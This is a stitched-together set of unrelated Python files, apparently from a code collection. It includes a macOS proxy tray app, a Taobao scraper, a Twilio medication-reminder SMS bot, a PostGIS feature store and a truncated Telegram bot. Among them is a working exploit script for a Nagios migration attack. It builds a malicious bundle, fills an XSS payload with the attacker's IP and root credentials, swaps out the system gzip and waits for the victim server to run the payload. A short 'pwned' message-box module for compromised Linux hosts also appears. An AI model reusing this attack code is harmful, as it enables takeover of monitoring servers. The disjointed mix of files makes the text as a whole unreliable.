config.set(["modules", "launcher", "proxy"], "pac")
config.save()
self.updateStatusBarMenu()
def enableGlobalProxy_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableGlobalProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableGlobalProxyCommand = getEnableGlobalProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableGlobalProxyCommand)
xlog.info("try enable global proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "gae")
config.save()
self.updateStatusBarMenu()
def enableGlobalXTunnel_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableXTunnelProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableXTunnelProxyCommand = getEnableXTunnelProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableXTunnelProxyCommand)
xlog.info("try enable global x-tunnel proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "x_tunnel")
config.save()
self.updateStatusBarMenu()
def enableGlobalSmartRouter_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableSmartRouterProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableSmartRouterCommand = getEnableSmartRouterProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableSmartRouterCommand)
xlog.info("try enable global smart-router proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "smart_router")
config.save()
self.updateStatusBarMenu()
def disableProxy_(self, _):
try:
helperDisableAutoProxy(currentService)
helperDisableGlobalProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
disableGlobalProxyCommand = getDisableGlobalProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, disableGlobalProxyCommand)
xlog.info("try disable proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "disable")
config.save()
self.updateStatusBarMenu()
def setupHelper():
try:
with open(os.devnull) as devnull:
subprocess.check_call(helper_path, stderr=devnull)
except:
rmCommand = "rm \\\"%s\\\"" % helper_path
cpCommand = "cp \\\"%s\\\" \\\"%s\\\"" % (os.path.join(current_path, 'mac_helper'), helper_path)
chownCommand = "chown root \\\"%s\\\"" % helper_path
chmodCommand = "chmod 4755 \\\"%s\\\"" % helper_path
executeCommand = 'do shell script "%s;%s;%s;%s" with administrator privileges' % (rmCommand, cpCommand, chownCommand, chmodCommand)
xlog.info("try setup helper:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
def getCurrentServiceMenuItemTitle():
if currentService:
return 'Connection: %s' % currentService
else:
return 'Connection: None'
def getProxyState(service):
if not service:
return
# Check if auto proxy is enabled
executeResult = subprocess.check_output(['networksetup', '-getautoproxyurl', service])
if ( executeResult.find('http://127.0.0.1:8086/proxy.pac\nEnabled: Yes') != -1 ):
return "pac"
# Check if global proxy is enabled
executeResult = subprocess.check_output(['networksetup', '-getwebproxy', service])
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 8087') != -1 ):
return "gae"
# Check if global proxy is enabled
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 1080') != -1 ):
return "x_tunnel"
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 8086') != -1 ):
return "smart_router"
return "disable"
# Generate commands for Apple Script
def getEnableAutoProxyCommand(service):
return "networksetup -setautoproxyurl \\\"%s\\\" \\\"http://127.0.0.1:8086/proxy.pac\\\"" % service
def getDisableAutoProxyCommand(service):
return "networksetup -setautoproxystate \\\"%s\\\" off" % service
def getEnableGlobalProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 8087" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 8087" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getEnableXTunnelProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 1080" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 1080" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getEnableSmartRouterProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 8086" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 8086" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getDisableGlobalProxyCommand(service):
disableHttpProxyCommand = "networksetup -setwebproxystate \\\"%s\\\" off" % service
disableHttpsProxyCommand = "networksetup -setsecurewebproxystate \\\"%s\\\" off" % service
return "%s;%s" % (disableHttpProxyCommand, disableHttpsProxyCommand)
# Call helper
def helperEnableAutoProxy(service):
subprocess.check_call([helper_path, 'enableauto', service, 'http://127.0.0.1:8086/proxy.pac'])
def helperDisableAutoProxy(service):
subprocess.check_call([helper_path, 'disableauto', service])
def helperEnableGlobalProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '8087'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '8087'])
def helperEnableXTunnelProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '1080'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '1080'])
def helperEnableSmartRouterProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '8086'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '8086'])
def helperDisableGlobalProxy(service):
subprocess.check_call([helper_path, 'disablehttp', service])
subprocess.check_call([helper_path, 'disablehttps', service])
def loadConfig():
if not currentService:
return
proxy_setting = config.get(["modules", "launcher", "proxy"], "smart_router")
if getProxyState(currentService) == proxy_setting:
return
try:
if proxy_setting == "pac":
helperDisableGlobalProxy(currentService)
helperEnableAutoProxy(currentService)
elif proxy_setting == "gae":
helperDisableAutoProxy(currentService)
helperEnableGlobalProxy(currentService)
elif proxy_setting == "x_tunnel":
helperDisableAutoProxy(currentService)
helperEnableXTunnelProxy(currentService)
elif proxy_setting == "smart_router":
helperDisableAutoProxy(currentService)
helperEnableSmartRouterProxy(currentService)
elif proxy_setting == "disable":
helperDisableAutoProxy(currentService)
helperDisableGlobalProxy(currentService)
else:
xlog.warn("proxy_setting:%r", proxy_setting)
except:
xlog.warn("helper failed, please manually reset proxy settings after switching connection")
sys_tray = MacTrayObject.alloc().init()
currentService = None
def fetchCurrentService(protocol):
global currentService
status = SystemConfiguration.SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
if not status:
currentService = None
return
serviceID = status['PrimaryService']
service = SystemConfiguration.SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
if not service:
currentService = None
return
currentService = service['UserDefinedName']
@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)
def networkChanged(center, observer, name, object, userInfo):
fetchCurrentService('IPv4')
loadConfig()
sys_tray.updateStatusBarMenu()
# Note: the following code can't run in class
def serve_forever():
app = AppKit.NSApplication.sharedApplication()
app.setDelegate_(sys_tray)
# Listen for network change
nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()
AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)
fetchCurrentService('IPv4')
AppHelper.runEventLoop()
def main():
serve_forever()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
import argparse
import getpass
import glob
import os
import socket
import subprocess
import time
import sys
script_description = (
"Prepare current system for migrate attack, output XSS payload\n"
"Requires to be run with sudo/root privs for writing files to system dirs"
)
def is_port_open(host='localhost', port=22):
s = socket.socket()
retval = s.connect_ex((host, port))
return retval == 0
gzip_cleanup_command = 'mv `which gzip`.bak `which gzip`'
def cleanup_gzip(verbose=False):
if verbose:
print(f'[*] Cleaning up gzip with: "{gzip_cleanup_command}"')
return os.system(gzip_cleanup_command)
def check_bundle():
bundle_location = '/tmp/nagiosbundle-*.tar.gz'
bundle_glob = glob.glob(bundle_location)
if len(bundle_glob) == 1:
print(f'[+] Attack bundle @ "{bundle_glob[0]}", will be deleted by Nagios during migration.')
elif len(bundle_glob) == 0:
print(f'[!] Bundle creation failed; no files matched "{bundle_location}"')
exit(-1)
elif len(bundle_glob) > 1:
print(f'[!] Multiple matching files for "{bundle_glob}", will cause attack to fail')
print(bundle_glob)
exit(-2)
def check_for_migration():
"""If migration files are found, delete them and return true"""
half_bundle_pattern = '/tmp/nagiosbundle-*.tar'
half_bundles = glob.glob(half_bundle_pattern)
if half_bundles:
for cur_file in half_bundles:
subprocess.run(['rm', cur_file])
return True
else:
return False
def main(ip, username, password, xss_payload_path):
# This script prints its steps and should cause exception on error
subprocess.run('./make_bundle.sh', check=True)
check_bundle()
with open('migrate_xss_template.html') as f:
template_data = f.read()
template_data = template_data.replace('$IP', ip)
template_data = template_data.replace('$USERNAME', username)
template_data = template_data.replace('$PASSWORD', password)
with open(xss_payload_path, 'w') as f:
f.write(template_data)
# If we're in a container, try to print the host path
host_mount = os.getenv('HOST_MOUNT')
guest_mount = os.getenv('GUEST_MOUNT')
if host_mount and guest_mount:
xss_payload_path = xss_payload_path.replace(guest_mount, host_mount)
xss_payload_path += ' (on the host)'
print(f'[+] Wrote populated xss payload to {xss_payload_path}')
#print(f'[ ] NOTE: {xss_payload_path} now contains the password in plaintext')
listening_locally = is_port_open('localhost', 22)
if listening_locally:
print(f'[*] SSH Appears to be listening on this host.')
if not listening_locally:
print(f'[!] SSH does not appear to be listening locally.')
cleanup_gzip()
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
sys.argv[0],
description=script_description,
)
parser.add_argument("attack_server", help="THIS server's IP or Hostname")
parser.add_argument("user", help="Username nagios will log in as (expects root or sudoer)")
parser.add_argument("--password",
help="Password for user (will be written out in plaintext). Will prompt if not provided.")
parser.add_argument("--dont_wait", action='store_true',
help="Don't wait for connection (you'll have to clean up gzip)")
parser.add_argument("--payload_path", default='./xss_migrate_payload.html',
help="Path to write populated XSS payload to")
args = parser.parse_args()
user = args.user
if args.password:
password = args.password
else:
password = getpass.getpass(f'Password for user "{user}": ')
main(args.attack_server, user, password, args.payload_path)
if args.dont_wait:
print('[*] Done. Remember to restore gzip from backup or else tar will be broken!')
print(f' Fix with: {gzip_cleanup_command}')
else:
# This cleans up any leftover files from previous connections
check_for_migration()
print('[*] Listening until payload is executed and migration runs, CTRL+C to exit...')
try:
while True:
time.sleep(1)
if check_for_migration():
# Sleeping an extra bit just to avoid any race possibility
time.sleep(1)
print('[+] Looks like the server connected, payload should have run.')
break
except KeyboardInterrupt:
print('[*] CTRL+C caught')
finally:
retval = cleanup_gzip(verbose=True)
print(f'[*] Return code: {retval}')
print('[*] Done!')
|
nilq/baby-python
|
python
|
import typing
from core import scriptercore
class LinuxDisplayPwnedMsgBox(scriptercore.Scripter):
AUTHOR: str = "Danakane"
def __init__(self):
super(LinuxDisplayPwnedMsgBox, self).__init__()
self.__title__: str = ""
self.__text__: str = ""
self.customize({"title": "The title of the messagebox",
"text": "The message of the messagebox"})
self.configure = self.__doconfig__
def __doconfig__(self, title, text):
self.__title__ = title
self.__text__ = text
def dojob(self) -> None:
self.send(str.format("zenity --error --text {0} --title {1} --width=200&",
self.__text__, self.__title__))
blueprint: typing.Callable = LinuxDisplayPwnedMsgBox
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Пример распаковки/упаковки контейнеров (cf/epf/ert) при помощи onec_dtools
Функционал аналогичен C++ версии v8unpack
Copyright (c) 2016 infactum
"""
import argparse
import sys
from onec_dtools import extract, build
def main():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-U', '--unpack', nargs=2, metavar=('in_filename', 'out_dir_name'))
group.add_argument('-B', '--build', nargs=2, metavar=('in_dir_name', 'out_filename'))
if len(sys.argv) == 1:
parser.print_help()
return 1
args = parser.parse_args()
if args.unpack is not None:
extract(*args.unpack)
if args.build is not None:
build(*args.build)
if __name__ == '__main__':
sys.exit(main())
|
nilq/baby-python
|
python
|
__author__ = "MetaCarta"
__copyright__ = "Copyright (c) 2006-2008 MetaCarta"
__license__ = "Clear BSD"
__version__ = "$Id: VersionedPostGIS.py 496 2008-05-18 13:01:13Z crschmidt $"
from FeatureServer.DataSource import DataSource
from vectorformats.Feature import Feature
from FeatureServer.DataSource.PostGIS import PostGIS
from vectorformats.Formats import WKT
try:
import cPickle
except ImportError:
import Pickle as cPickle
import uuid
class VersionedPostGIS (PostGIS):
"""A proof of concept for versioned PostGIS-powered geo-database support.
Allows 'open tagging', and creates transaction logs for looking through
historical changes to the datastore."""
def __init__(self, name, srid = 4326, srid_out = 4326, fid = "id", geometry = "shape", order = "", **args):
DataSource.__init__(self, name, **args)
self.db = None
self.table = "feature"
self.fid_col = fid
self.geom_col = geometry
self.order = order
self.srid = srid
self.srid_out = srid_out
self.dsn = args["dsn"]
def begin (self):
PostGIS.begin(self)
self.txn_uuid = uuid.uuid1().hex
sql = """INSERT INTO txn (uuid, actor, message, commit_time)
VALUES ('%s', 1, 'message', now());""" % self.txn_uuid
cursor = self.db.cursor()
cursor.execute(str(sql))
def commit (self):
sql = """update txn set bbox = envelope(collect(shape)) from history
where history.txn_id = txn.uuid and txn.uuid = '%s'""" \
% self.txn_uuid
cursor = self.db.cursor()
cursor.execute(str(sql))
PostGIS.commit(self)
def insert (self, action):
feature = action.feature
values = {'geom' : WKT.to_wkt(feature.geometry),
'uuid' : uuid.uuid1().hex,
'attrs': self._serializeattrs(feature.properties)}
sql = """INSERT INTO %s (%s, uuid, attrs)
VALUES (SetSRID(%%(geom)s::geometry, %s),
%%(uuid)s, %%(attrs)s)""" % (
self.table, self.geom_col, self.srid)
cursor = self.db.cursor()
cursor.execute(str(sql), values)
return {}
def update (self, action):
feature = action.feature
sql = """UPDATE %s SET %s = SetSRID(%%(geom)s::geometry, %s),
attrs = %%(attrs)s WHERE %s = %(id)d""" % (
self.table, self.geom_col, self.srid, self.fid_col )
values = {'geom' : WKT.to_wkt(feature.geometry),
'id' : action.id,
'attrs': self._serializeattrs(feature.properties)}
cursor = self.db.cursor()
cursor.execute(str(sql), values)
return self.select(action)
def select (self, action):
cursor = self.db.cursor()
if action.id is not None:
sql = "SELECT AsText(%s) as fs_binary_geom_col, * FROM %s WHERE %s = %%(%s)d" % (
self.geom_col, self.table, self.fid_col, self.fid_col )
cursor.execute(str(sql), {self.fid_col: action.id})
result = [cursor.fetchone()]
else:
filters = []
attrs = {}
if action.bbox:
filters.append( "%s && SetSRID('BOX3D(%f %f,%f %f)'::box3d, %s) and intersects(%s, SetSRID('BOX3D(%f %f,%f %f)'::box3d, %s))" % (
(self.geom_col,) + tuple(action.bbox) + (self.srid,) + (self.geom_col,) + (tuple(action.bbox) + (self.srid,))))
if action.attributes:
match = Feature(props = action.attributes)
filters = self.feature_predicates(match)
attrs = action.attributes
sql = "SELECT AsText(%s) as fs_binary_geom_col, uuid, id, attrs FROM %s" % (self.geom_col, self.table)
#if filters:
# sql += " WHERE " + " AND ".join(filters)
if self.order:
sql += self.order
if action.maxfeatures:
sql += " LIMIT %d" % action.maxfeatures
else:
sql += " LIMIT 1000"
if action.startfeature:
sql += " OFFSET %d" % action.startfeature
cursor.execute(str(sql), attrs)
result = cursor.fetchall() # should use fetchmany(action.maxfeatures)
columns = [desc[0] for desc in cursor.description]
features = []
for row in result:
props = dict(zip(columns, row))
geom = WKT.from_wkt(props['fs_binary_geom_col'])
if props.has_key(self.geom_col): del props[self.geom_col]
del props['fs_binary_geom_col']
props.update(self._deserializeattrs(props['attrs']))
del props['attrs']
fid = props[self.fid_col]
del props[self.fid_col]
for key, value in props.items():
if isinstance(value, str):
props[key] = unicode(value, "utf-8")
features.append( Feature( fid, geom, self.geom_col, self.srid_out, props ) )
return features
def _serializeattrs(self, properties):
import sys
print >>sys.stderr, properties
return cPickle.dumps(properties)
def _deserializeattrs(self, attrstr):
return cPickle.loads(attrstr)
|
nilq/baby-python
|
python
|
import requests as reqs
import base64
import logging
import re
import json
# 调用淘宝识图请求接口,获取商品源和标签
def taobao_pic_recognize(pic_dir,pic_name,cookie):
# with open(pic_dir+'/'+pic_name, "rb") as f:
# # b64encode:编码,b64decode: 解码
# base64_data = base64.b64encode(f.read())
imagefile={ "file": (pic_name, open(pic_dir+'/'+pic_name, "rb"), "image/%s" % pic_name.split('.')[1])}
header={
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',
'cookie': cookie,
'origin': 'https://s.taobao.com',
'referer': 'https://s.taobao.com/search?q=&imgfile=&js=1&stats_click=search_radio_all%253A1&initiative_id=staobaoz_20191105&ie=utf8&tfsid=O1CN01g6xEgi1TxE8ft6Nmb_!!0-imgsearch.jpg&app=imgsearch',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36',
'x-requested-with': 'XMLHttpRequest'}
res_pic=reqs.post('https://s.taobao.com/image',files=imagefile,headers=header, verify=False)
print(res_pic.json()['name'])
res_alias=reqs.get("""https://s.taobao.com/search?q=&imgfile=&js=1&stats_click=search_radio_all&initiative_id=staobaoz_20191105&ie=utf8&tfsid=%s&app=imgsearch""" % res_pic.json()['name'],{},headers=header,verify=False)
#reg=r'<script>+[\W]+g_page_config = ([\w\W]+"map":{}};);+[\W]+<\/script>'
reg_alias=r'<script>+[\W]+g_page_config = ([\w\W]+"map":{}})+'
m=re.search(reg_alias,res_alias.text,re.M|re.I)
data=json.loads(m.group(1))
# 外观相似宝贝
item = data['mods']['itemlist']['data']['collections'][0]#['auctions'][0]
# 您可能会喜欢
# item = data['mods']['itemlist']['data']['collections'][1]
for i,detail in enumerate(item['auctions']):
if i==3:
break
else:
print('商品:',detail['title'],detail['pic_url'],detail['detail_url'])
res_detail=reqs.get("https:"+detail['detail_url'],{},headers=header,verify=False)
reg_detail=r'"attributes-list"+([\w\W]+)</ul>+'
m=re.search(reg_detail,res_detail.text,re.M|re.I)
detail=m.group(1).replace('\t','').replace('"','').replace('\'','').replace(' ','').replace(' ','').replace('\r','').replace('\n','').replace('<li','')
field_list=detail.split('</li>')
for field in field_list[0:-1]:
try:
f_obj=field.split('>')[-1].split(':')
f_key=f_obj[0]
f_value=f_obj[1]
print('属性:',f_key,f_value)
except Exception as e:
print(e)
pass
|
nilq/baby-python
|
python
|
from flask import Flask, request, redirect
from twilio.twiml.messaging_response import MessagingResponse
import pandas as pd
import datetime
import pytz
# the below import is only needed for forwarding the sms, in case the client sends KONTAKT
from twilio.rest import Client
account_sid = '######################'
auth_token = '*********************'
client = Client(account_sid, auth_token)
# below is the number that is supposed to send out the sms to one of use, in case a client has send KONTAKT
happ_num1 = '+14*******'
# below is the number on which we will receive the sms with the message that a client requests KONTAKT
happ_num2 = '+15*******'
app = Flask(__name__)
file_path = '/home/.../dummy_patient_table.txt'
@app.route("/sms", methods=['GET', 'POST'])
def incoming_sms():
"""Send a dynamic reply to an incoming text message"""
# Get the message and phone number the of the user replying back
body = request.values.get('Body', None)
phone_num = request.values.get('From', None)
# get all the data to this user in a data fram
df0 = pd.read_csv(file_path, dtype={'weekday': str})
df0.reminder_start = pd.to_datetime(df0.reminder_start).dt.tz_localize('UTC').dt.tz_convert('Europe/Sofia')
df0.reminder_stop = pd.to_datetime(df0.reminder_stop).dt.tz_localize('UTC').dt.tz_convert('Europe/Sofia')
df = df0[df0.phone_num == phone_num]
# dictionary below turns the weekday number into weekday names for the messages
num2wday = {0:'пон.', 1:'вт.', 2:'ср.', 3:'четв.', 4:'пет.', 5:'съб.', 6:'нед.'}
# Start our TwiML response
resp = MessagingResponse()
# Determine the right reply for this message
if body == 'INFO':
pass
# this code word is preserved by twilio, but this can be changed:
# https://www.twilio.com/docs/sms/services/advanced-opt-out
if body.lower() == 'инфо':
m = 'Вие използвате услугата на Хапп за напомняне на приемане на лекарства.\nЗа спиране на услугата напишете STOP\nЗа да се свържем с Вас обратно - KONTAKT\nЗа списък на всички лекарства с включени напомняния - NAPOMNYANIYA\nЗа достъп до листовката на определено лекарство - INFO-[LEKARSTVO], например INFO-AMIDOFEN\nЗа детайли за всички лекарства, които взимате - LEKARSTVA\nЗа списък на всички лекарства които взимате и сте взимали - ISTORIYA'
resp.message(m)
if body.lower() == 'стоп':
# set all the reminder flags of this patient to 0 and save the update df0 to the file
df0.reminder_flag[df0.phone_num == phone_num] = 0
# update also the column of the stop date with the current date
df0.reminder_stop[df0.phone_num == phone_num] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# you also need to update the current working version of the dataframe (df)
df.reminder_flag[df.phone_num == phone_num] = 0
df.reminder_stop[df.phone_num == phone_num] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# update the changes also the the original file itself
df0.to_csv(file_path, index=False, date_format="%d.%m.%y")
m = 'Вие успешно се отписахте от услугата за напомняния на Хапп. Ако искате да я включите на ново отговорете START'
resp.message(m)
if body.lower() == 'napomnyaniya' or body.lower() == 'напомняния':
# sends messages of the kind:
# За следните лекарства има включени напомняния:
# Амидофен, ден 6 от 14 от услугата: напомняния в 09:00, 15:00, 21:00
# Валериан, ден 3 : 09:00, 17:00, само вторник и петък.
# За спиране на напомнянията отговорете STOP. За да активирате напомняния за допълнителни лекарства, моля отговорете с KONTAKT.
# select only medications with reminder flag == 1
df = df[df.reminder_flag == 1]
df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['med_intake_time'].apply(list).reset_index(name='med_intake_time')
str_list = ['За следните лекарства има включени напомняния:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
frequency = ', '.join(num2wday[day_num] for day_num in row.weekday)
# calculate the days since the start of the reminder_start
time_delta = datetime.datetime.now(pytz.timezone('Europe/Sofia')) - row.reminder_start
days_of_service = time_delta.days
med_and_doses = f'{row.medicine}, ден {days_of_service} от услугата: напомняния {frequency} в ' + ', '.join(row.med_intake_time) + '\n'
str_list.append(med_and_doses)
resp.message(''.join(str_list))
if body.lower() == 'lekarstva' or body.lower() == 'лекарства':
#sends message of the kind:
# “Детайли за Вашите лекарства:
# Амидофен, всеки ден, от 06/10/2020 до 14/10/2020: 1 хапче от 2 мг в 09:00, 2 хапчета от 2 мг в 15:00, 1 хапче от 2 мг в 21:00
# Валериан (06/10/2020-14/10/2020, вторник и петък): 1 хапче от 2 мг в 09:00, 1 хапче от 2 мг в 17:00.
# select only medications with reminder flag == 1
df = df[df.reminder_flag == 1]
df['dose+time'] = df.dose + ' в ' + df.med_intake_time
df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['dose+time'].apply(list).reset_index(name='dose+time')
str_list = ['Детайли за Вашите лекарства:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
frequency = ', '.join(num2wday[day_num] for day_num in row.weekday)
med_and_doses = f'{row.medicine}, {frequency}, {row.reminder_start.strftime("%d.%m.%y")}-{row.reminder_stop.strftime("%d.%m.%y")}: ' + ', '.join(row['dose+time']) + '\n'
str_list.append(med_and_doses)
resp.message(''.join(str_list))
if body.lower() == 'istoriya' or body.lower() == 'история':
# is like 'lekasrstva' from above, but shows instead of current medications the ones you have taken previously
#sends message of the kind:
# “Преди сте приемали следните лекарства:
# Амидофен, всеки ден, от 06/10/2020 до 14/10/2020: 1 хапче от 2 мг в 09:00, 2 хапчета от 2 мг в 15:00, 1 хапче от 2 мг в 21:00
# Валериан (06/10/2020-14/10/2020, вторник и петък): 1 хапче от 2 мг в 09:00, 1 хапче от 2 мг в 17:00.
# select only medications with reminder flag == 1
df = df[df.reminder_flag == 0]
df['dose+time'] = df.dose + ' в ' + df.med_intake_time
df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['dose+time'].apply(list).reset_index(name='dose+time')
str_list = ['Преди сте приемали следните лекарства:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
frequency = ', '.join(num2wday[day_num] for day_num in row.weekday)
med_and_doses = f'{row.medicine}, {frequency}, {row.reminder_start.strftime("%d.%m.%y")}-{row.reminder_stop.strftime("%d.%m.%y")}: ' + ', '.join(row['dose+time']) + '\n'
str_list.append(med_and_doses)
str_list.append('За детайли относно лекарствата, които взимате сега отговорете LEKARSTVA')
resp.message(''.join(str_list))
if 'info-' in body.lower() or 'инфо-' in body.lower():
# if the message contains 'info' string of some kind strip it and make the letters lower case
stripped_str = body.lstrip('info-').lstrip('INFO-').lstrip('ИНФО-').lstrip('инфо-').lower()
# check if the residual string is contained in the columns 'medicine' or the latinized version 'med_latinized'
if df.medicine.str.contains(stripped_str).any() or df.med_latinized.str.contains(stripped_str).any():
# get the link to the medicine, depending on in what column it is located
try:
link = df.link[df.medicine == stripped_str].iloc[0]
except:
link = df.link[df.med_latinized == stripped_str].iloc[0]
resp.message(f'Вижте тук листовка към лекарсвото {stripped_str}: {link} \nАко имате въпроси или проблеми с Вашето лекарство обърнете се към Вашия лекар или фармацевт.')
else:
all_meds_of_customer = ', '.join(df.medicine.unique())
# if the string is not contained we tell the customer, that he has missspelled the medicine
resp.message(f'Зададеното от Вас лекарство {stripped_str} не e измежду въведените Ваши лекарства - {all_meds_of_customer}')
# this is to stop not all the medications of the patient, but only a selected one, e.g. 'стоп-аспирин'
if 'stop-' in body.lower() or 'стоп-' in body.lower():
# if the message contains 'stop' string of some kind strip it and make the letters lower case
stripped_str = body.lower().lstrip('stop-').lstrip('стоп-')
# check if the residual string is contained in the columns 'medicine' or the latinized version 'med_latinized'
if df.medicine.str.contains(stripped_str).any() or df.med_latinized.str.contains(stripped_str).any():
# get the link to the medicine, depending on in what column it is located
try:
# set all the reminder flags of this patient to 0 and save the update df0 to the file
df0.reminder_flag[(df0.phone_num == phone_num) & (df0.medicine == stripped_str)] = 0
# update also the column of the stop date with the current date
df0.reminder_stop[(df0.phone_num == phone_num) & (df0.medicine == stripped_str)] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# you also need to update the current working version of the dataframe (df)
df.reminder_flag[(df.phone_num == phone_num) & (df.medicine == stripped_str)] = 0
df.reminder_stop[(df.phone_num == phone_num) & (df.medicine == stripped_str)] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# update the changes also the the original file itself
df0.to_csv(file_path, index=False, date_format="%d.%m.%y")
# this is for the case that the client types the medicine in latin, instead of cyrillic, e.g. amidofen, instead of амидофен
except:
df0.reminder_flag[(df0.phone_num == phone_num) & (df0.med_latinized == stripped_str)] = 0
# update also the column of the stop date with the current date
df0.reminder_stop[(df0.phone_num == phone_num) & (df0.med_latinized == stripped_str)] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# you also need to update the current working version of the dataframe (df)
df.reminder_flag[(df.phone_num == phone_num) & (df.med_latinized == stripped_str)] = 0
df.reminder_stop[(df.phone_num == phone_num) & (df.med_latinized == stripped_str)] = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
# update the changes also the the original file itself
df0.to_csv(file_path, index=False, date_format="%d.%m.%y")
resp.message(f'Успешно прекратихте Вашите напомнянията за {stripped_str}!')
else:
all_meds_of_customer = ', '.join(df.medicine.unique())
# if the string is not contained we tell the customer, that he has missspelled the medicine
resp.message(f'Зададеното от Вас лекарство {stripped_str} не e измежду въведените Ваши лекарства - {all_meds_of_customer}')
if body.lower() == 'kontakt' or body.lower() == 'контакт':
m = f'Клиент с номер {phone_num} запита контакт с нас, свържи се с него!'
message = client.messages.create(body=m, from_= happ_num1, to=happ_num2)
return str(resp)
if __name__ == "__main__":
app.run(debug=True)
|
nilq/baby-python
|
python
|
from src.bert_classifier.model import Model
from src.bert_classifier.fit import fit
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from telegram.ext import Updater, MessageHandler, Filters
import traceback as tb
import json
import random
import threading
START_MESSAGE = ('''
Loop message in chat / group / channel.
add - /add message: add message to loop.
list - /list: list message inside the loop.
remove - /remove message_number: remove the message inside the loop.
''')
loopPos = {}
INTERVAL = 3600
with open('CREDENTIALS') as f:
CREDENTIALS = json.load(f)
debug_group = CREDENTIALS.get('debug_group') or -1001198682178
try:
with open('DB') as f:
DB = json.load(f)
except:
DB = {}
def saveDB():
with open('DB', 'w') as f:
f.write(json.dumps(DB, sort_keys=True, indent=2))
def splitCommand(text):
pieces = text.split()
if len(pieces) < 1:
return '', ''
command = pieces[0]
return command.lower(), text[text.find(command) + len(command):].strip()
def getDB(msg):
key = str(msg.chat_id)
DB[key] = DB.get(key, [])
return DB[key]
def add(msg, content):
getDB(msg).append(content)
saveDB()
msg.reply_text('success', quote=False)
msg.forward(chat_id = debug_group)
if msg.chat and msg.chat.username:
msg.bot.send_message(chat_id=debug_group, text='t.me/' + msg.chat.username)
def listLoop(msg):
